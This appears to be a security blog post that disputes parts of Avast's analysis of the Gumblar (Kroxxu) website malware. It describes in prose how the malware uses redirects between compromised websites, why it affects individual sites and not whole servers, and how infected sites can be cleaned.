Clearing Up Recent Information about Gumblar (Kroxxu) Malware

Avast has released a new analysis of the latest variant of the Gumblar ( which Avast refers to as Kroxxu) malware. This analysis and the media coverage of it contains some misleading information about the malware.

Some of the media coverage has claimed this new or newly detected, but this variant has been around since October of 2009 and was detected at the time.

Avast emphasizes that the malware makes use of redirection to making the malware sound more nefarious and advanced than it actually is. The malware is not the only malware to use redirection. Other malware makes use of redirection as part of it basic setup, whereas Gumblar’s is a by-product of how it operates. It is not an attempt to hide the malware as Avast believes is possibly the case or a glitch as they also believe is possible. Instead of hosting the code that infects user’s computers on server controlled by the person(s) behind the malware, as is the standard practice, the code is placed on some of the websites that they have compromised. The websites they use for this purpose are frequently changed and when they switch they set the old ones to redirect to the new ones. Gumblar updates the other infected websites to call these new infected websites, but leaves calls to the old website in JavaScript files leading to the redirects.

Avast refers to infected servers, but the malware does not affect the servers at all instead affecting individual websites hosted on a server. This is an important distinction because on shared servers Gumblar would not infect other websites which it does not have FTP credentials for. Avast claims that there is “difficulty in removing” it, which is not true. If a clean backup is available the website can simply be reverted to that. If that is not available the malware code needs to be removed from the files, which is no more difficult than any of malware added to websites. More sophisticated malware does infect the server itself, making it more difficult to clean.

Avast also emphasizes that the infections have remained on websites for long periods of time, which is true, but this is not out of the ordinary for website malware.

While it is difficult to measure the size of website malware infections, Avast currently claimed and historical size is not above the level of many of the larger malware infections.